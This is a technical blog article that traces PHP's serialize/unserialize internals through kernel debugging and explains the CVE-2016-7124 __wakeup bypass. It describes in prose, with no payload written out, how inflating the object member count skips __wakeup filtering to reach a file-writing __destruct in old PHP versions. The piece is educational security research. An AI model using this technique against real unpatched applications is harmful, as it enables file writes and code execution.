Preface
In the process of learning PHP, I found that some PHP features are difficult to understand, such as PHP 00 truncation, MD5 flaws, deserialization bypass__wakeup
, etc. I don't want to stick to the superficial understanding, but want to explore how the PHP core does it.
The following is a deserialization vulnerability commonly used in CTF, CVE-2016-7124 (bypassing the magic function __wakeup), as an example to share the process of debugging the PHP kernel. Including the entire part from the establishment of the kernel source code debugging environment, serialization and deserialization kernel source code analysis to the final vulnerability analysis. (Recommended:PHP Tutorial)
1. Thoughts triggered by an example
We can first look at the small example I wrote.
Based on the picture above, we first introduce the magic functions in PHP:
Let’s first take a look at the official documentation for several commonly used magic functions. Introduction:
Here is a brief summary, when a class is initialized as an instance,__construct
will be called, and when it is destroyed,__destruct will be called
.
When a class callsserialize
for serialization, the__sleep
function is automatically called. When a string is to be deserialized usingunserialize
When converted into a class, the__wakeup
function will be called. The above magic functions will be called automatically if they exist. No need to manually make display calls yourself.
Now let’s look at the initial part of the code. In the__destruct
function, there are sensitive operations of writing files. We use deserialization to construct dangerous strings here, which may cause code execution vulnerabilities.
When we constructed the corresponding string and prepared to use it, we found that there was a filtering operation in its__wakeup
function, which hindered our construction. Because we know that deserialization must first call the__wakeup
function.
Here we can’t help but think of using this PHP deserialization vulnerability CVE-2016-7124 (bypassing the magic function __wakeup) to easily bypass the magic function ___wakeup that will be automatically called during deserialization. Sensitive operations are written to the file.
Of course, the above code is just a simple example that I personally gave, and there are many similar situations mentioned above in real situations. But this bypass method intrigues me a lot. How does PHP's internal operation and processing affect the upper-level code logic to cause such a magical situation (BUG). Next, I will conduct dynamic debugging analysis of the PHP kernel. Explore this question.
This vulnerability (CVE-2016-7124) affects versions of the PHP5 series before 5.6.25 and 7.x series before 7.0.10. So we will compile two versions later: one is version 7.3.0 that is not affected by this vulnerability, and the other version is version 5.6.10 where the vulnerability exists. Compare the two versions to learn more about the differences.
2. Setting up the PHP source code debugging environment
We all know that PHP is developed in C language, because the environment I use is WIN 10, Therefore, we mainly introduce the environment construction under Windows. We need the following materials:
PHP源码 PHP SDK工具包,用于构建PHP 调试所需要IDE
The source code can be downloaded on GITHUB, link: https://github.com/php/php-src, you can select the required version to download.
PHPSDK toolkit download address: https://github.com/Microsoft/php-sdk-binary-tools The toolkit downloaded from this address only supports VC14 and VC15. Of course, you can also find VC11, VC12, etc. that support lower versions of PHP from https://windows.php.net/downloads/. Before using the PHP SDK, you must ensure that you have VS installed with the corresponding version of the Windows SDK component.
PHP7.3.0 and 5.6.10 will be used in the following article. The source code compilation of these two versions will be introduced below. The methods for other versions are similar.
2.1 Compile Windows PHP 7.3.0
The native environment is WIN10 X64, and the PHP SDK is downloaded from the above github link. Enter the SDK directory and find 4 batch files. Double-clickphpsdk-vc15-x64
here.
Then enterphpsdk_buildtreephp7
in this shell, you will find that the php7 folder appears in the same directory, and the shell directory has also changed.
Then we put the decompressed source code under \php7\vc15\x64. The shell enters this folder and uses thephpsdk_deps–update–branchmaster
command to update and download the relevant dependent components.
After waiting for completion, enter the source code directory and double-click thebuildconf.bat
batch file. It will releaseconfigure.bat
andconfigure.js
Two files, run configure–disable-all–enable-cli–enable-debug–enable-phar in the shell to configure the corresponding compilation options. If you have other needs, you can execute configure –help to view
According to the prompts, use nmake to compile directly.
Compilation is completed, and the executable file directory is in the php7\vc15\x64\php-src\x64\Debug_TS folder. We can enter php -v to view relevant information.
2.2 Compile Windows PHP 5.6.10
The method is the same as 7.3.0, just pay attention to the use of PHP5.6 The WindowsSDK component version is VC11, you need to download VS2012, and you cannot use the PHP SDK downloaded from github for compilation. You need to select the VC11 PHP SDK and related dependent components on https://windows.php.net/downloads/ for compilation. The rest It is exactly the same as above and will not be repeated here.
2.3 Debugging configuration
Because we have compiled the PHP interpreter above, we use VSCODE directly for debugging.
After downloading, install the C/C debugging extension.
Then open the source code directory, click Debug -> Open Configuration, the launch.json file will open.
According to the above figure, after configuring these three parameters, you can write PHP code in 1.php in the current directory, and set breakpoints in the PHP source code for direct debugging. .
The debugging environment is set up.
3. PHP deserialization source code analysis
Generally speaking of PHP deserialization, there are usually two functions that appear in pairs, serialize and unserialize, which are of course not necessary. There are also two magic methods __sleep() and __wakeup(). As we all know, serialization simply means that objects are stored in files, while deserialization is just the opposite. The objects are read out from the file and instantiated.
Next, based on the debugging environment set up above, we use dynamic debugging to intuitively reflect what serialization and deserialization is done in PHP (version 7.3.0).
3.1 serialize source code analysis
Let’s first write a simple Demo that does not contain the__sleep
magic function:
Then we search globally for theserialize
function in the source code and locate this function in the var.c file. We put a breakpoint directly under the function header and start debugging.
We can see that after doing some preparation work, we start to enter the serialization processing function, and we follow up thephp_var_serialize
function.
We will continue to follow thephp_var_serialize_intern
function. The following is the main processing function. Because there are many function codes, we only intercept them here. The key part is that this function is also in the var.c file.
The structure of the entire function is a switch case, and the type of the struc variant is parsed through the macro Z_TYPE_P (this macro expands to struc->u1.v.type) , to determine the type to be serialized, and then enter the corresponding CASE part for operation. The figure below shows the type definition.
According to the number 8 in the red box above, we know that it needs to be serialized into an object at this timeIS_OBJECT
, enter the corresponding CASE branch:
We see the calling timing of the magic function__sleep
in the picture above. Because this function does not exist in the Demo we wrote, the process will not enter this branch. Different branches represent different processing flows. We will look at the process with the magic function __sleep later.
Because there is no process hit in the above case IS_OBJECT branch, and there is no break statement in the case, execution continues into the IS_ARRAY branch, where the class is extracted from the struc structure name, calculate its length and assign it to the buf structure, and extract the structure to be serialized in the class and store it in the hash array.
The next step is to use thephp_var_serialize_intern
function to recursively parse the entire hash array, extract the variable name and value from it, perform format analysis and Splice the parsed string into the buf structure. Finally, when the whole process is completed, the entire string is completely stored in the flexible array structure buf.
#It can be seen from the red box in the above picture that it is consistent with the final result. Let's slightly modify the Demo and add the magic function__sleep
. According to the official documentation, the__sleep
function must return an array. We also called a class member function in this function. Observe its specific behavior.
#The previous process is exactly the same and will not be repeated here. Let’s start from the branch point.
We directly follow up on thephp_var_serialize_call_sleep
function.
We continue to follow up herecall_user_function
, according to the macro definition, it actually calls the_call_user_function_ex
function, Some copy actions have been done here, so no screenshots are taken. The process then proceeds to the call of thezend_call_function
function.
In functionzend_call_function
, in actual circumstances, we need to do some of our own things in__sleep
, here PHP will push the operations to be done into PHP's ownzend_vm
engine stack, and will be parsed one by one later (that is, parsing the corresponding OPCODE).
The process here will hit this branch, we follow up thezend_execute_ex
function.
We can see here that in ZEND_VM, the overall processing flow is a while(1) loop, which continuously parses the operations in the ZEND_VM stack. The ZEND_VM engine in the red box in the above figure will use theZEND_FASTCALL
method to dispatch to the corresponding processing function.
Because we called the member function show in__sleep
, here we first locate the show , and then the next operation will continue to be pushed into the ZEND_VM stack for the next round of new parsing (here, the operations in show are processed) until the entire operation is parsed. We will not follow up further here.
Do you still remember the above outgoing parameter retval, which is the return value of __sleep? The picture above shows the first element x of the returned array. Of course, you can also Check directly in the variable.
After such a big circle, different paths lead to the same goal. After processing a series of operations in the _sleep function, we then use the php_var_serialize_class function to serialize the class name and recursively serialize the structure in the return value of its _sleep function. Finally, the results are stored in the buf structure. At this point, the entire process of serialization is completed.
3.1.1 Summary of serialize process
We summarize the serialization process:
When there is no magic function, serialize class name–> ;Use recursion to serialize the remaining structure
When there is a magic function, call the magic function __sleep–>Use the ZEND_VM engine to parse the PHP operation—>Return the array of the structure that needs to be serialized–>Serialization Class name –> Utilize recursive serialization of the return value structure of __sleep.
3.2 unserialize source code analysis
After reading the serialize process, next, we will look at theunserialize
process from the simplest Demo. This example does not contain magic functions.
The method is the same as above,unserialize
The source code is also in the var.c file.
The above picture involves the new features in PHP7, deserialization with filtering, according toallowed_classes
settings to filter the corresponding PHP objects to prevent illegal data injection. The filtered object will be converted into a__PHP_Incomplete_Class object which cannot be used directly, but it has no impact on the deserialization process and will not be discussed in detail here. We follow up with the php_var_unserialize function.
php_var_unserialize_internalfunction here.
object_common2function.
PHP_FUNCTION. We see that there is some finishing work, release the applied space, and reverse the sequence. Completed. Our magic function
__wakeupis not called here. In order to find out the calling timing of
__wakeup, we modify the Demo here.
PHP_VAR_UNSERIALIZE_DESTROYrelease space.
Do you still remember the VAR_WAKEUP_FLAG flag when __wakeup is found in the deserialization process? Here, when traversing the bar_dtor_hash array and encountering this flag, the call to __wakeup is officially started. The later calling method is the same as the previous one. The __sleep calling method introduced is exactly the same, and will not be repeated here. At this point, all deserialization processes are completed.
3.2.1 Summary of the serialize process
We can see from the above that the deserialization process does not depend on whether the magic function appears compared to the serialization process. to create differences in the process. The Unserialize process is as follows:
Get the deserialized string –> Deserialize according to the type –> Look up the table to find the corresponding deserialization class –> Determine the number of elements based on the string –> new creates a new instance -> iteratively parses the remaining string -> determines whether there is a magic function __wakeup and marks it -> releases the space and determines whether it has a mark -> turns on the call.
4. PHP Deserialization Vulnerability
With the above source code foundation, let’s now explore the vulnerability CVE-2016-7124 (bypassing __wakeup) magic function.
Therefore, the vulnerability has certain version requirements. We use another PHP version (5.6.10) compiled above to reproduce and debug this vulnerability.
First we reproduce the vulnerability:
We can see here that the TEST class only contains one element $a, and we are desequencing it here When modifying the value representing the number of elements in the element string, this vulnerability will be triggered. This class avoids the call of the magic function__wakeup
.
Of course, an interesting phenomenon was also discovered during the process of triggering the vulnerability. This is not the only triggering method.
#The deserialization operations corresponding to the four payloads in the above picture will trigger this vulnerability. Although the four below will trigger vulnerabilities, there are some minor differences. Here we slightly modify the code:
We can see from the above figure that in the deserialized string, as long as the elements in the parsing class appear This vulnerability will be triggered whenever an error occurs. However, changing the internal operations of the class element (such as modifying the string length, class variable type, etc. in the figure above) will cause the class member variable assignment to fail. Only when the number of class members is modified (larger than the original number of members) can the success of class member assignment be guaranteed.
Let’s look at the problem through debugging:
According to our analysis of the deserialization source code in the third part, we guess that it may occur in the final parsed variable. problem. Here we go directly to the debugger for dynamic debugging:
We can see that compared with the source code of version 7.3.0, this version has no filter parameters and has passed With so many versions of iterations, the processing process for lower versions now seems relatively simple. However, the overall harmonic logic has not changed. We directly follow the php_var_unserialize function here. The same logic will not be repeated again. We will directly follow the difference (object_common2 function), which is the code for processing member variables in the class.
In the function object_common2, there are two main operations, process_nested_data iteratively parses the data in the class and the call of the magic function __wakeup, and when the process_nested_data function fails to parse, it directly returns a value of 0 , the subsequent __wakeup function will not have a chance to be called.
This explains why there is more than one payload that triggers the vulnerability.
When only the number of class members is modified, the while loop can be completed once, which allows the member variables in our class to be completely assigned. When modifying the internal member variables, the pap_var_unserialize function call fails, and then the zval_dtor and FREE_ZVAL functions are called to release the current key (variable) space, causing the variable assignment in the class to fail.
On the other hand, in the PHP7.3.0 version, there is no calling process here, it is just marked simply, and the timing of the entire magic function calling process is moved to the point where the data is released. This avoids this bypass problem. This vulnerability should be caused by a logical flaw.
The above is the detailed content of PHP kernel layer parsing deserialization vulnerability. For more information, please follow other related articles on the PHP Chinese website!